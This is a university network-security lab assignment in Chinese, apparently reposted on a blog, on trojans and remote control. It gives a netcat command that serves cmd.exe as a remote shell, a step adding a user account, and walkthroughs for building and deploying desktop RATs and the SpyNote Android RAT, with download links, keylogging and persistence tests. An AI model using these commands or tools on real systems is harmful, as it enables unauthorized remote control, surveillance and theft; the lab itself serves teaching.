中國人民公安大學
Chinese people’ public security university
網路對抗技術
實驗報告
|
實驗四 |
|
惡意代碼技術 |
|
學生姓名 |
王予辰 |
|
年級 |
2017級 |
|
區隊 |
網路實驗班 |
|
指導教師 |
高見 |
資訊技術與網路安全學院
2016年11月7日
實驗任務總綱
2016—2017 學年 第 一 學期
一、實驗目的
1.通過對木馬的練習,使讀者理解和掌握木馬傳播和運行的機制;通過手動洗掉木馬,掌握檢查木馬和洗掉木馬的技巧,學會防御木馬的相關知識,加深對木馬的安全防范意識,
2.了解并熟悉常用的網路攻擊工具,木馬的基本功能;
3.達到鞏固課程知識和實際應用的目的,
二、實驗要求
1.認真閱讀每個實驗內容,需要截圖的題目,需清晰截圖并對截圖進行標注和說明,
2.檔案要求結構清晰,圖文表達準確,標注規范,推理內容客觀、合理、邏輯性強,
3.軟體工具可使用NC、MSF等,
4.實驗結束后,保留電子檔案,
三、實驗步驟
1.準備
提前做好實驗準備,實驗前應把詳細了解實驗目的、實驗要求和實驗內容,熟悉并準備好實驗用的軟體工具,按照實驗內容和要求提前做好實驗內容的準備,
2.實驗環境
描述實驗所使用的硬體和軟體環境(包括各種軟體工具);
開機并啟動軟體office2003或2007、瀏覽器、加解密軟體,
3.實驗程序
1)啟動系統和啟動工具軟體環境,
2)用軟體工具實作實驗內容,
4.實驗報告
按照統一要求的實驗報告格式書寫實驗報告,把按照模板格式撰寫的檔案嵌入到實驗報告檔案中,檔案按照規定的書寫格式書寫,表格要有表說圖形要有圖說,
任務一 利用NC控制電腦
NetCat,具有網路軍刀之稱,它小巧精悍且功能強大,說它小巧精悍,是因為他的軟體大小現在已經壓縮到只有十幾KB,而且在功能上絲毫不減,
實驗程序需要兩個同學相互配合完成:
可以ping通
步驟一:
在受害者的機器 (同學A)
輸入下面的命令:
nc.exe -l
-p port -e cmd.exe 進入監聽模式
步驟二:
在攻擊者的機器.(同學B)
輸入下面的命令:
nc
ip port //連接victim_IP,然后得到一個shell,
步驟三:
在shell中,利用net user 用戶名 密碼 /add ,添加一個用戶,并在受害者的機器中使用 net user 命令進行驗證,(需要截圖)
可以繼續通過命令列做一些事情,
任務二 利用木馬控制電腦
相關工具:
https://pan.baidu.com/s/1ipOkdU2HTPFtgU6fF669Gg
https://pan.baidu.com/s/1ajmRKsnv5XvFrKWzszDYwQ(備用,另外一個木馬)
實驗程序需要兩個同學配合:
步驟一:
攻擊者的機器. (同學A)
打開V2014.exe程式或則star RAT,這兩個木馬功能類似,
步驟二:
點擊選單欄中的“服務生成”,在彈出的配置服務端中,配置回連IP地址(攻擊者IP)和埠號,并點擊“生成”按鈕,生成木馬服務端,
步驟三:
將生成的木馬可執行程式拷貝到受害者的機器,并雙擊運行,
步驟四:
在控制端中查看木馬上線情況,并對以下功能每個進行測驗和截圖,
- 檔案管理,嘗試拷貝檔案
- 螢屏控制,嘗試獲取桌面
- 鍵盤記錄,嘗試獲取對方擊鍵記錄
- 會話管理,重啟對方機器,查看是否能自啟動上線
會話管理,卸載對方的木馬,
任務三 Android遠控實踐 所有程序截圖寫博客
相關工具下載:
需要先安裝.net framework4.0 (自行搜索下載)
spynote及環境工具:(解壓密碼rekings.com)
鏈接:https://pan.baidu.com/s/1TfPULyW2zvGOeJ_SOXUvSw
提取碼:eufr
android模擬器:
https://www.yeshen.com/
或
http://mumu.163.com/
實驗步驟:
一、攻擊者打開spynote軟體,該軟體需要先安裝.netframework4.0和jdk環境,
二、配置并打開監聽埠
點擊Listen Port,在彈出的對話框中輸入埠號,并點擊Add按鈕,最后點擊OK,成功監聽本地埠,【本程序選用3210埠,實驗程序大家可以自己選擇埠】
三、配置并生成木馬
(1)點擊Build Client按鈕,彈出對話框
(2)配置回連IP和埠,IP地址填寫運行spynote的機器IP,埠填寫監聽的埠號,本次填寫2222埠,
(3)配置相關屬性資訊,
(4)最后點擊Build按鈕,在選擇框中選擇和spynote同處在一個檔案夾中Patch-release.apk,
(5)完成后,自動打開APK生成所在的檔案夾,
四、將木馬安裝在Android模擬器中,
五、在Spynote中控制手機
可以在spynote中看到有一臺機器上線,并可以查看其基本資訊,
在該機器中右鍵,可以看到可以對該機器進行控制的功能,從中選擇4個以上的專案進行實驗,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/47336.html
標籤:其他
上一篇:Pikachu-File Inclusion, Unsafe file download & Unsafe file upload